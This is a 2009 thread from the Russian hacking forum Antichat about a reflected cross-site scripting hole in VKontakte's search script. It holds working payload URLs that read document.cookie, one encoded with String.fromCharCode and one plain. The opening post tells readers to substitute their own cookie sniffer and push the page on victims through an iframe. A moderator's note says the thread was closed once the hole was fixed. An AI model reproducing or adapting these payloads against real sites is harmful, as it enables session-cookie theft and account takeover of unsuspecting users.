Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Пассивная XSS вконтакте (https://forum.antichat.xyz/showthread.php?t=125506)

wildshaman 16.06.2009 11:49
Пассивная XSS вконтакте
 
Сегодня увидел на форуме тему _spamer_, то кто-то ему вапривал какие-то ссылки, посмотрел исходник тех страниц - увидел там в iframe какую-то ссылку на вконтатке. XSS, подумал я. так оно и оказалось. XSS была зашифрована, расшифроваа, я ее разобрал и сейчас представляю Вам.
Сама XSS наодится в скрипте нового поиска - gsearch и выглядит вот так (выводит куки алертом):
Код:
http://vkontakte.ru/gsearch.php?q=%5C%27;document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,34,106,97,118,97,115,99,114,105,112,116,58,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,34,62))//
здесь в String.fromCharCode зашифровано следующее:
Код:
<img src="javascript:alert(document.cookie)">
, шифровал я с помощью http://ha.ckers.org/xss.html (внизу строка Decimal Value:), заменив &# на запятую (и убрав первую).
Вместо вывода куков вы можете подставить туда свой снифер, зашифроать, а затем впаривать в iframe данную страницу. удачи в использовании, засекаем время, пока не прикроют :)

На стаью не претендую, просто для новичков расписал все немного подробнее.

mailbrush 17.06.2009 10:06
Пассивная XSS на ВКонтакте.RU #2
Код:
http://vkontakte.ru/gsearch.php?q=';()())//\';alert(document.cookie)//";<>")//\";<>"<>""!---"?>
Я рулеззз!!! Посмотрим сколько эта проживет...

wildshaman 17.06.2009 10:10
Цитата:
Сообщение от mailbrush
Пассивная XSS на ВКонтакте.RU #2
Код:
http://vkontakte.ru/gsearch.php?q=';()())//\';alert(document.cookie)//";<>")//\";<>"<>""!---"?>
Я рулеззз!!! Посмотрим сколько эта проживет...
прикроют вместе сразу обе :)
Кстати, одно и то же, просто у меня закодироанное, у тебя нет :)

AFoST 17.06.2009 10:59
Код:
http://vkontakte.ru/gsearch.php?q=';()())//\';alert(document.cookie)//";<>")//\";<>"<>""!---"?>

http://vkontakte.ru/gsearch.php?q=%5C%27;document.write(String.fromCha  rCode(60,105,109,103,32,115,114,99,61,34,106,97,11  8,97,115,99,114,105,112,116,58,97,108,101,114,116,  40,100,111,99,117,109,101,110,116,46,99,111,111,10  7,105,101,41,34,62))//
одинаковый скрипт gsearch.php. мейлбруш, ты не нашел новую багу, ты нашел другой обход фильтраций.

mailbrush 17.06.2009 11:16
Ну да, я же не говорил "Бага №2", я сказал: "XSS №2"

Jokester 17.06.2009 13:28
Вобщем так , господа, мне надоело чистить эту тему от бессмысленных постов. Видимо слово "вконтакте" действует на некоторых непредсказуемо и привлекает весь народ из болталки сюда. Так вот, обращаю ваше внимание - это раздел "Уязвимости", и ваши комментарии : "спасибо", "круто", "удалите", "её закроют", "её откроют", "ТС Хакер", "ТС не хакер", "Я хакер", "Уберите в приват", "спрячьте от людей" и т.д. Вы можете оставить при себе.

Так-же при себе оставьте вопросы "Оно ещё работает?", "Мне кажется, или уже не работает?" и т.д.

У кого не работает, тому и не надо.

Единственное, что я хочу сдесь увидеть - это "Её закрыли" от компетентного человека, после чего тема будет закрыта.

Ну и конечно обсуждение ПО ТЕМЕ , если вы найдёте что тут можно обсудить.

Флуд будет наказываться.


================================
ADD

ЗАКРЫТО, ИБО ПОФИКСИЛИ


Время: 04:56